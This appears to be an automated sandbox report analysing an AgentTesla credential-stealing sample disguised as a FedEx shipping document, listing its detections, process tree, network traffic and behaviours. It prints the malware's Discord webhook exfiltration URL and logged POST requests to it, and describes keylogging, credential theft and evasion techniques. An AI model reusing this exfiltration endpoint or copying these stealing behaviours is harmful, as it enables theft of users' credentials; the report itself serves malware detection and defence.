Joe Sandbox Cloud Basic Analysis Report

Loading Joe Sandbox Report ...

Edit tour

Windows Analysis Report
FeDex_shipping_document.exe

Overview

General Information

Sample Name:FeDex_shipping_document.exe
Analysis ID:830454
MD5:5cf87a160007a5e6c7a4d24e1d831327
SHA1:e11d7467bc961d5ff16c3541200be1ad5083cefa
SHA256:91e74ee16f6229b18ef4f973494b8ec68bad3420e90fd3f1ee6d835048421fcf
Tags:AgentTeslaexeFedEx
Infos:

Detection

AgentTesla
Score:100
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Multi AV Scanner detection for submitted file
Yara detected AgentTesla
Snort IDS alert for network traffic
Installs a global keyboard hook
Tries to steal Mail credentials (via file / registry access)
Initial sample is a PE file and has a suspicious name
Tries to harvest and steal Putty / WinSCP information (sessions, passwords, etc)
Contains functionality to register a low level keyboard hook
Machine Learning detection for sample
May check the online IP address of the machine
Injects a PE file into a foreign processes
Queries sensitive network adapter information (via WMI, Win32_NetworkAdapter, often done to detect virtual machines)
Tries to harvest and steal browser information (history, passwords, etc)
Queries sensitive BIOS Information (via WMI, Win32_Bios & Win32_BaseBoard, often done to detect virtual machines)
Uses 32bit PE files
Queries the volume information (name, serial number etc) of a device
May sleep (evasive loops) to hinder dynamic analysis
Uses code obfuscation techniques (call, push, ret)
Internet Provider seen in connection with other malware
Detected potential crypto function
Yara detected Credential Stealer
JA3 SSL client fingerprint seen in connection with other malware
IP address seen in connection with other malware
Contains long sleeps (>= 3 min)
Enables debug privileges
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Sample file is different than original file name gathered from version info
Uses a known web browser user agent for HTTP communication
Creates a window with clipboard capturing capabilities
Queries sensitive processor information (via WMI, Win32_Processor, often done to detect virtual machines)
Creates a process in suspended mode (likely to inject code)

Classification

Process Tree

  • System is w10x64
  • FeDex_shipping_document.exe (PID: 5300 cmdline: C:\Users\user\Desktop\FeDex_shipping_document.exe MD5: 5CF87A160007A5E6C7A4D24E1D831327)
    • FeDex_shipping_document.exe (PID: 3628 cmdline: C:\Users\user\Desktop\FeDex_shipping_document.exe MD5: 5CF87A160007A5E6C7A4D24E1D831327)
  • cleanup

Malware Threat Intel

Provided by

NameDescriptionAttributionBlogpost URLsLink
Agent Tesla, AgentTeslaA .NET based keylogger and RAT readily available to actors. Logs keystrokes and the host's clipboard and beacons this information back to the C2.
  • SWEED
https://malpedia.caad.fkie.fraunhofer.de/details/win.agent_tesla

Malware Configuration

Threatname: Agenttesla

{"Exfil Mode": "Discord", "Discord url": "https://discord.com/api/webhooks/1085961054116380784/6mOHAJEbhkHvMnx5Lupuieun02GlpoDDe4vKN3n-OIFv4DLpFFRiyRBhgIyiXf6D4mYj"}

Yara Signatures

Memory Dumps

SourceRuleDescriptionAuthorStrings
00000001.00000002.521394788.000000000305B000.00000004.00000800.00020000.00000000.sdmpJoeSecurity_AgentTesla_1Yara detected AgentTeslaJoe Security
    Process Memory Space: FeDex_shipping_document.exe PID: 3628JoeSecurity_AgentTesla_1Yara detected AgentTeslaJoe Security
      Process Memory Space: FeDex_shipping_document.exe PID: 3628JoeSecurity_CredentialStealerYara detected Credential StealerJoe Security

        Sigma Signatures

        No Sigma rule has matched

        Snort Signatures

        Timestamp:192.168.2.7162.159.138.232497014432851779 03/20/23-11:52:05.074477
        SID:2851779
        Source Port:49701
        Destination Port:443
        Protocol:TCP
        Classtype:A Network Trojan was detected

        Joe Sandbox Signatures

        Click to jump to signature section

        Show All Signature Results

        AV Detection

        barindex
        Multi AV Scanner detection for submitted file
        Source: FeDex_shipping_document.exeReversingLabs: Detection: 38%
        Source: FeDex_shipping_document.exeVirustotal: Detection: 34%Perma Link
        Machine Learning detection for sample
        Source: FeDex_shipping_document.exeJoe Sandbox ML: detected
        Source: 0.2.FeDex_shipping_document.exe.4549c80.9.unpackMalware Configuration Extractor: Agenttesla {"Exfil Mode": "Discord", "Discord url": "https://discord.com/api/webhooks/1085961054116380784/6mOHAJEbhkHvMnx5Lupuieun02GlpoDDe4vKN3n-OIFv4DLpFFRiyRBhgIyiXf6D4mYj"}
        Source: FeDex_shipping_document.exeStatic PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE
        Source: unknownHTTPS traffic detected: 64.185.227.155:443 -> 192.168.2.7:49700 version: TLS 1.2
        Source: unknownHTTPS traffic detected: 162.159.138.232:443 -> 192.168.2.7:49701 version: TLS 1.2
        Source: FeDex_shipping_document.exeStatic PE information: DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
        Source: Binary string: nlsY.pdb source: FeDex_shipping_document.exe
        Source: Binary string: nlsY.pdbSHA256 source: FeDex_shipping_document.exe

        Networking

        barindex
        Snort IDS alert for network traffic
        Source: TrafficSnort IDS: 2851779 ETPRO TROJAN Agent Tesla Telegram Exfil 192.168.2.7:49701 -> 162.159.138.232:443
        May check the online IP address of the machine
        Source: unknownDNS query: name: api.ipify.org
        Source: unknownDNS query: name: api.ipify.org
        Source: unknownDNS query: name: api.ipify.org
        Source: C:\Users\user\Desktop\FeDex_shipping_document.exeDNS query: name: api.ipify.org
        Source: C:\Users\user\Desktop\FeDex_shipping_document.exeDNS query: name: api.ipify.org
        Source: C:\Users\user\Desktop\FeDex_shipping_document.exeDNS query: name: api.ipify.org
        Source: Joe Sandbox ViewASN Name: CLOUDFLARENETUS CLOUDFLARENETUS
        Source: Joe Sandbox ViewJA3 fingerprint: 3b5074b1b5d032e5620f69f9f700ff0e
        Source: Joe Sandbox ViewIP Address: 162.159.138.232 162.159.138.232
        Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:99.0) Gecko/20100101 Firefox/99.0Host: api.ipify.orgConnection: Keep-Alive
        Source: global trafficHTTP traffic detected: POST /api/webhooks/1085961054116380784/6mOHAJEbhkHvMnx5Lupuieun02GlpoDDe4vKN3n-OIFv4DLpFFRiyRBhgIyiXf6D4mYj HTTP/1.1Content-Type: multipart/form-data; boundary=----------f62e205f82fd40c8a956e69d1bcde1edUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:99.0) Gecko/20100101 Firefox/99.0Host: discord.comContent-Length: 1217Expect: 100-continueConnection: Keep-Alive
        Source: global trafficHTTP traffic detected: POST /api/webhooks/1085961054116380784/6mOHAJEbhkHvMnx5Lupuieun02GlpoDDe4vKN3n-OIFv4DLpFFRiyRBhgIyiXf6D4mYj HTTP/1.1Content-Type: multipart/form-data; boundary=----------8b7e5ceedd2047309d0db2508590a0cdUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:99.0) Gecko/20100101 Firefox/99.0Host: discord.comContent-Length: 2002Expect: 100-continue
        Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49700
        Source: unknownNetwork traffic detected: HTTP traffic on port 49702 -> 443
        Source: unknownNetwork traffic detected: HTTP traffic on port 49700 -> 443
        Source: unknownNetwork traffic detected: HTTP traffic on port 49701 -> 443
        Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49702
        Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49701
        Source: FeDex_shipping_document.exe, 00000001.00000002.521394788.00000000030B0000.00000004.00000800.00020000.00000000.sdmp, FeDex_shipping_document.exe, 00000001.00000002.521394788.0000000003074000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://discord.com
        Source: FeDex_shipping_document.exe, 00000000.00000002.272021390.0000000007322000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://fontfabrik.com
        Source: FeDex_shipping_document.exe, 00000001.00000002.521394788.0000000003011000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
        Source: FeDex_shipping_document.exe, 00000000.00000002.272021390.0000000007322000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.apache.org/licenses/LICENSE-2.0
        Source: FeDex_shipping_document.exe, 00000000.00000002.272021390.0000000007322000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.carterandcone.coml
        Source: FeDex_shipping_document.exe, 00000000.00000002.272021390.0000000007322000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.fontbureau.com
        Source: FeDex_shipping_document.exe, 00000000.00000002.272021390.0000000007322000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.fontbureau.com/designers
        Source: FeDex_shipping_document.exe, 00000000.00000002.272021390.0000000007322000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.fontbureau.com/designers/?
        Source: FeDex_shipping_document.exe, 00000000.00000002.272021390.0000000007322000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.fontbureau.com/designers/cabarga.htmlN
        Source: FeDex_shipping_document.exe, 00000000.00000002.272021390.0000000007322000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.fontbureau.com/designers/frere-jones.html
        Source: FeDex_shipping_document.exe, 00000000.00000002.272021390.0000000007322000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.fontbureau.com/designers8
        Source: FeDex_shipping_document.exe, 00000000.00000002.272021390.0000000007322000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.fontbureau.com/designers?
        Source: FeDex_shipping_document.exe, 00000000.00000002.272021390.0000000007322000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.fontbureau.com/designersG
        Source: FeDex_shipping_document.exe, 00000000.00000002.272021390.0000000007322000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.fonts.com
        Source: FeDex_shipping_document.exe, 00000000.00000002.272021390.0000000007322000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.founder.com.cn/cn
        Source: FeDex_shipping_document.exe, 00000000.00000002.272021390.0000000007322000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.founder.com.cn/cn/bThe
        Source: FeDex_shipping_document.exe, 00000000.00000002.272021390.0000000007322000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.founder.com.cn/cn/cThe
        Source: FeDex_shipping_document.exe, 00000000.00000002.272021390.0000000007322000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.galapagosdesign.com/DPlease
        Source: FeDex_shipping_document.exe, 00000000.00000002.272021390.0000000007322000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.galapagosdesign.com/staff/dennis.htm
        Source: FeDex_shipping_document.exe, 00000000.00000002.272021390.0000000007322000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.goodfont.co.kr
        Source: FeDex_shipping_document.exe, 00000000.00000002.272021390.0000000007322000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.jiyu-kobo.co.jp/
        Source: FeDex_shipping_document.exe, 00000000.00000002.272021390.0000000007322000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.sajatypeworks.com
        Source: FeDex_shipping_document.exe, 00000000.00000002.272021390.0000000007322000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.sakkal.com
        Source: FeDex_shipping_document.exe, 00000000.00000002.272021390.0000000007322000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.sandoll.co.kr
        Source: FeDex_shipping_document.exe, 00000000.00000002.272021390.0000000007322000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.tiro.com
        Source: FeDex_shipping_document.exe, 00000000.00000002.272021390.0000000007322000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.typography.netD
        Source: FeDex_shipping_document.exe, 00000000.00000002.272021390.0000000007322000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.urwpp.deDPlease
        Source: FeDex_shipping_document.exe, 00000000.00000002.272021390.0000000007322000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.zhongyicts.com.cn
        Source: FeDex_shipping_document.exe, 00000001.00000002.521394788.0000000003011000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://api.ipify.org
        Source: FeDex_shipping_document.exe, 00000001.00000002.521394788.0000000003098000.00000004.00000800.00020000.00000000.sdmp, FeDex_shipping_document.exe, 00000001.00000002.521394788.0000000003057000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://cdn.discordapp.com/attachments/1085960984071524425/1087327699887980574/user-128757_2023
        Source: FeDex_shipping_document.exe, 00000001.00000002.521394788.0000000003169000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://cdn.discordapp.com/attachments/1085960984071524425/1087327704275234847/user-128757_2023
        Source: FeDex_shipping_document.exe, 00000001.00000002.521394788.0000000003074000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://discord.com
        Source: FeDex_shipping_document.exe, 00000001.00000002.521394788.0000000003011000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://discord.com/api/webhooks/1085961054116380784/6mOHAJEbhkHvMnx5Lupuieun02GlpoDDe4vKN3n-OIFv4DL
        Source: FeDex_shipping_document.exe, 00000001.00000002.521394788.0000000003074000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://discord.com4
        Source: FeDex_shipping_document.exe, 00000001.00000002.521394788.00000000030B0000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://discord.comD8
        Source: FeDex_shipping_document.exe, 00000001.00000002.521394788.0000000003098000.00000004.00000800.00020000.00000000.sdmp, FeDex_shipping_document.exe, 00000001.00000002.521394788.0000000003057000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://media.discordapp.net/attachments/1085960984071524425/1087327699887980574/user-128757_20
        Source: FeDex_shipping_document.exe, 00000001.00000002.521394788.0000000003169000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://media.discordapp.net/attachments/1085960984071524425/1087327704275234847/user-128757_20
        Source: unknownHTTP traffic detected: POST /api/webhooks/1085961054116380784/6mOHAJEbhkHvMnx5Lupuieun02GlpoDDe4vKN3n-OIFv4DLpFFRiyRBhgIyiXf6D4mYj HTTP/1.1Content-Type: multipart/form-data; boundary=----------f62e205f82fd40c8a956e69d1bcde1edUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:99.0) Gecko/20100101 Firefox/99.0Host: discord.comContent-Length: 1217Expect: 100-continueConnection: Keep-Alive
        Source: unknownDNS traffic detected: queries for: api.ipify.org
        Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:99.0) Gecko/20100101 Firefox/99.0Host: api.ipify.orgConnection: Keep-Alive
        Source: unknownHTTPS traffic detected: 64.185.227.155:443 -> 192.168.2.7:49700 version: TLS 1.2
        Source: unknownHTTPS traffic detected: 162.159.138.232:443 -> 192.168.2.7:49701 version: TLS 1.2

        Key, Mouse, Clipboard, Microphone and Screen Capturing

        barindex
        Installs a global keyboard hook
        Source: C:\Users\user\Desktop\FeDex_shipping_document.exeWindows user hook set: 0 keyboard low level C:\Users\user\Desktop\FeDex_shipping_document.exeJump to behavior
        Contains functionality to register a low level keyboard hook
        Source: C:\Users\user\Desktop\FeDex_shipping_document.exeCode function: 1_2_06AA1ED8 SetWindowsHookExA 0000000D,00000000,?,?,?,?,?,?,?,?,?,06AA25F0,00000000,000000001_2_06AA1ED8
        Source: C:\Users\user\Desktop\FeDex_shipping_document.exeWindow created: window name: CLIPBRDWNDCLASSJump to behavior

        System Summary

        barindex
        Initial sample is a PE file and has a suspicious name
        Source: initial sampleStatic PE information: Filename: FeDex_shipping_document.exe
        Source: FeDex_shipping_document.exeStatic PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE
        Source: C:\Users\user\Desktop\FeDex_shipping_document.exeCode function: 0_2_0184C8440_2_0184C844
        Source: C:\Users\user\Desktop\FeDex_shipping_document.exeCode function: 0_2_0184F1E80_2_0184F1E8
        Source: C:\Users\user\Desktop\FeDex_shipping_document.exeCode function: 0_2_0184F1F80_2_0184F1F8
        Source: C:\Users\user\Desktop\FeDex_shipping_document.exeCode function: 1_2_06AA0B801_2_06AA0B80
        Source: C:\Users\user\Desktop\FeDex_shipping_document.exeCode function: 1_2_06AAF0D81_2_06AAF0D8
        Source: C:\Users\user\Desktop\FeDex_shipping_document.exeCode function: 1_2_06AAA6601_2_06AAA660
        Source: C:\Users\user\Desktop\FeDex_shipping_document.exeCode function: 1_2_06C9C5601_2_06C9C560
        Source: C:\Users\user\Desktop\FeDex_shipping_document.exeCode function: 1_2_06C91CA41_2_06C91CA4
        Source: C:\Users\user\Desktop\FeDex_shipping_document.exeCode function: 1_2_06C989781_2_06C98978
        Source: C:\Users\user\Desktop\FeDex_shipping_document.exeCode function: 1_2_06C92B801_2_06C92B80
        Source: C:\Users\user\Desktop\FeDex_shipping_document.exeCode function: 1_2_06C92B701_2_06C92B70
        Source: C:\Users\user\Desktop\FeDex_shipping_document.exeCode function: 1_2_06C9CB211_2_06C9CB21
        Source: C:\Users\user\Desktop\FeDex_shipping_document.exeCode function: 1_2_06C939501_2_06C93950
        Source: C:\Users\user\Desktop\FeDex_shipping_document.exeCode function: 1_2_06E3DD301_2_06E3DD30
        Source: C:\Users\user\Desktop\FeDex_shipping_document.exeCode function: 1_2_06E326C01_2_06E326C0
        Source: C:\Users\user\Desktop\FeDex_shipping_document.exeCode function: 1_2_06E3168A1_2_06E3168A
        Source: C:\Users\user\Desktop\FeDex_shipping_document.exeCode function: 1_2_06E3AEA81_2_06E3AEA8
        Source: C:\Users\user\Desktop\FeDex_shipping_document.exeCode function: 1_2_06E33FE01_2_06E33FE0
        Source: C:\Users\user\Desktop\FeDex_shipping_document.exeCode function: 1_2_06E31DF71_2_06E31DF7
        Source: C:\Users\user\Desktop\FeDex_shipping_document.exeCode function: 1_2_06E388F81_2_06E388F8
        Source: C:\Users\user\Desktop\FeDex_shipping_document.exeCode function: 1_2_06E379201_2_06E37920
        Source: C:\Users\user\Desktop\FeDex_shipping_document.exeCode function: 1_2_070D136B1_2_070D136B
        Source: FeDex_shipping_document.exe, 00000000.00000000.247629334.0000000000F28000.00000002.00000001.01000000.00000003.sdmpBinary or memory string: OriginalFilenamenlsY.exe> vs FeDex_shipping_document.exe
        Source: FeDex_shipping_document.exe, 00000000.00000002.268564133.000000000451B000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilename48f370b8-933f-4461-84a9-c0775ee1b0df.exe4 vs FeDex_shipping_document.exe
        Source: FeDex_shipping_document.exe, 00000000.00000002.273598775.0000000007AE0000.00000004.08000000.00040000.00000000.sdmpBinary or memory string: OriginalFilenameOutimurs.dll2 vs FeDex_shipping_document.exe
        Source: FeDex_shipping_document.exe, 00000000.00000002.268564133.00000000041B9000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilenameOutimurs.dll2 vs FeDex_shipping_document.exe
        Source: FeDex_shipping_document.exe, 00000000.00000002.266746771.0000000003287000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilenameCruiser.dll, vs FeDex_shipping_document.exe
        Source: FeDex_shipping_document.exe, 00000000.00000002.266746771.00000000031F7000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilenameCruiser.dll, vs FeDex_shipping_document.exe
        Source: FeDex_shipping_document.exe, 00000000.00000002.266746771.00000000031F7000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilename48f370b8-933f-4461-84a9-c0775ee1b0df.exe4 vs FeDex_shipping_document.exe
        Source: FeDex_shipping_document.exe, 00000001.00000002.515103370.0000000000402000.00000040.00000400.00020000.00000000.sdmpBinary or memory string: OriginalFilename48f370b8-933f-4461-84a9-c0775ee1b0df.exe4 vs FeDex_shipping_document.exe
        Source: FeDex_shipping_document.exe, 00000001.00000002.515787794.0000000000F38000.00000004.00000010.00020000.00000000.sdmpBinary or memory string: OriginalFilenameUNKNOWN_FILET vs FeDex_shipping_document.exe
        Source: FeDex_shipping_document.exeBinary or memory string: OriginalFilenamenlsY.exe> vs FeDex_shipping_document.exe
        Source: FeDex_shipping_document.exeStatic PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
        Source: FeDex_shipping_document.exeReversingLabs: Detection: 38%
        Source: FeDex_shipping_document.exeVirustotal: Detection: 34%
        Source: FeDex_shipping_document.exeStatic PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
        Source: C:\Users\user\Desktop\FeDex_shipping_document.exeKey opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiersJump to behavior
        Source: unknownProcess created: C:\Users\user\Desktop\FeDex_shipping_document.exe C:\Users\user\Desktop\FeDex_shipping_document.exe
        Source: C:\Users\user\Desktop\FeDex_shipping_document.exeProcess created: C:\Users\user\Desktop\FeDex_shipping_document.exe C:\Users\user\Desktop\FeDex_shipping_document.exe
        Source: C:\Users\user\Desktop\FeDex_shipping_document.exeProcess created: C:\Users\user\Desktop\FeDex_shipping_document.exe C:\Users\user\Desktop\FeDex_shipping_document.exeJump to behavior
        Source: C:\Users\user\Desktop\FeDex_shipping_document.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{CF4CC405-E2C5-4DDD-B3CE-5E7582D8C9FA}\InprocServer32Jump to behavior
        Source: C:\Users\user\Desktop\FeDex_shipping_document.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
        Source: C:\Users\user\Desktop\FeDex_shipping_document.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
        Source: C:\Users\user\Desktop\FeDex_shipping_document.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
        Source: C:\Users\user\Desktop\FeDex_shipping_document.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
        Source: C:\Users\user\Desktop\FeDex_shipping_document.exeFile created: C:\Users\user\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\FeDex_shipping_document.exe.logJump to behavior
        Source: classification engineClassification label: mal100.troj.spyw.evad.winEXE@3/2@4/3
        Source: FeDex_shipping_document.exeStatic file information: TRID: Win32 Executable (generic) Net Framework (10011505/4) 49.83%
        Source: C:\Users\user\Desktop\FeDex_shipping_document.exeSection loaded: C:\Windows\assembly\NativeImages_v4.0.30319_32\mscorlib\a152fe02a317a77aeee36903305e8ba6\mscorlib.ni.dllJump to behavior
        Source: C:\Users\user\Desktop\FeDex_shipping_document.exeSection loaded: C:\Windows\assembly\NativeImages_v4.0.30319_32\mscorlib\a152fe02a317a77aeee36903305e8ba6\mscorlib.ni.dllJump to behavior
        Source: C:\Users\user\Desktop\FeDex_shipping_document.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
        Source: C:\Users\user\Desktop\FeDex_shipping_document.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
        Source: C:\Users\user\Desktop\FeDex_shipping_document.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
        Source: C:\Users\user\Desktop\FeDex_shipping_document.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
        Source: C:\Users\user\Desktop\FeDex_shipping_document.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
        Source: C:\Users\user\Desktop\FeDex_shipping_document.exeFile opened: C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorrc.dllJump to behavior
        Source: C:\Users\user\Desktop\FeDex_shipping_document.exeKey opened: HKEY_CURRENT_USER\Software\Microsoft\Office\15.0\Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676Jump to behavior
        Source: FeDex_shipping_document.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR
        Source: FeDex_shipping_document.exeStatic PE information: DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
        Source: FeDex_shipping_document.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_DEBUG
        Source: Binary string: nlsY.pdb source: FeDex_shipping_document.exe
        Source: Binary string: nlsY.pdbSHA256 source: FeDex_shipping_document.exe
        Source: C:\Users\user\Desktop\FeDex_shipping_document.exeCode function: 0_2_0184CB36 pushfd ; ret 0_2_0184CB39
        Source: C:\Users\user\Desktop\FeDex_shipping_document.exeCode function: 1_2_06AAD532 push es; ret 1_2_06AAD540
        Source: C:\Users\user\Desktop\FeDex_shipping_document.exeCode function: 1_2_070D1360 pushfd ; retf 1_2_070D1369
        Source: initial sampleStatic PE information: section name: .text entropy: 7.872797130775443
        Source: C:\Users\user\Desktop\FeDex_shipping_document.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Users\user\Desktop\FeDex_shipping_document.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Users\user\Desktop\FeDex_shipping_document.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Users\user\Desktop\FeDex_shipping_document.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Users\user\Desktop\FeDex_shipping_document.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Users\user\Desktop\FeDex_shipping_document.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Users\user\Desktop\FeDex_shipping_document.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Users\user\Desktop\FeDex_shipping_document.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Users\user\Desktop\FeDex_shipping_document.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Users\user\Desktop\FeDex_shipping_document.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Users\user\Desktop\FeDex_shipping_document.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Users\user\Desktop\FeDex_shipping_document.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Users\user\Desktop\FeDex_shipping_document.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Users\user\Desktop\FeDex_shipping_document.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Users\user\Desktop\FeDex_shipping_document.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Users\user\Desktop\FeDex_shipping_document.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Users\user\Desktop\FeDex_shipping_document.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Users\user\Desktop\FeDex_shipping_document.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Users\user\Desktop\FeDex_shipping_document.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Users\user\Desktop\FeDex_shipping_document.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Users\user\Desktop\FeDex_shipping_document.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Users\user\Desktop\FeDex_shipping_document.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Users\user\Desktop\FeDex_shipping_document.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Users\user\Desktop\FeDex_shipping_document.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Users\user\Desktop\FeDex_shipping_document.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Users\user\Desktop\FeDex_shipping_document.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Users\user\Desktop\FeDex_shipping_document.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Users\user\Desktop\FeDex_shipping_document.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Users\user\Desktop\FeDex_shipping_document.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Users\user\Desktop\FeDex_shipping_document.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Users\user\Desktop\FeDex_shipping_document.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Users\user\Desktop\FeDex_shipping_document.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Users\user\Desktop\FeDex_shipping_document.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Users\user\Desktop\FeDex_shipping_document.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Users\user\Desktop\FeDex_shipping_document.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Users\user\Desktop\FeDex_shipping_document.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Users\user\Desktop\FeDex_shipping_document.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Users\user\Desktop\FeDex_shipping_document.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Users\user\Desktop\FeDex_shipping_document.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Users\user\Desktop\FeDex_shipping_document.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Users\user\Desktop\FeDex_shipping_document.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Users\user\Desktop\FeDex_shipping_document.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Users\user\Desktop\FeDex_shipping_document.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Users\user\Desktop\FeDex_shipping_document.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
